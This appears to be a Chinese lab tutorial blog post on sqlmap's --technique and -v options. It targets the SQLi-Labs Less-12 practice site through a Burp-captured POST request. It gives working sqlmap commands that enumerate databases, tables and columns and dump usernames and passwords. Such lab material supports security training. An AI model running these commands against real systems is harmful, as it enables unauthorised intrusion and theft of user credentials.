SQLMAP进阶使用 --technique -v

实验原理

使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。
注入时,可以利用--technique参数指定SQLMAP使用的探测技术:B表示布尔盲注,T表示时间盲注(延迟注入),E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情。

1.访问SQLi-Labs网站

访问Less-12

http://192.168.5.116/sqli-labs/Less-12/

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

https://i-blog.csdnimg.cn/blog_migrate/6537c43e77c2c49277bee1eab6d0b1af.png

2)设置Firefox代理

https://i-blog.csdnimg.cn/blog_migrate/cb1a5d206e1b1864cd54b6e933bcf66e.png

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能
https://i-blog.csdnimg.cn/blog_migrate/10bfdc0ae0c2cf91c783ede54dd6aa1c.png

 4)利用Burpsuite工具拦截HTTP请求包

输入用户名admin,密码任意,点击Submit登录,此时Burpsuite会拦截到HTTP请求包

 5)将请求包内容拷贝至D:\1.txt中

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

https://i-blog.csdnimg.cn/blog_migrate/4a3c18e77fb82bf1d103b451fa3c7c5b.png

 4.寻找注入点

python sqlmap.py -r D:\1.txt --technique "U" -v 3

其中,--technique"U"表示使用基于联合查询的技术;-v表示显示等级,当取值大于等于3时,将显示SQLMAP检测过程中所使用的payload详情。

 

 检测结果

5.获取数据库的库名 

 1)获取所有数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --dbs

 2)获取当前数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --current-db

 6.获取security数据库中的所有表名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security --tables

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users --columns

 

8.获取users表id,username和password字段的全部值

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users -C id,username,password --dump

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值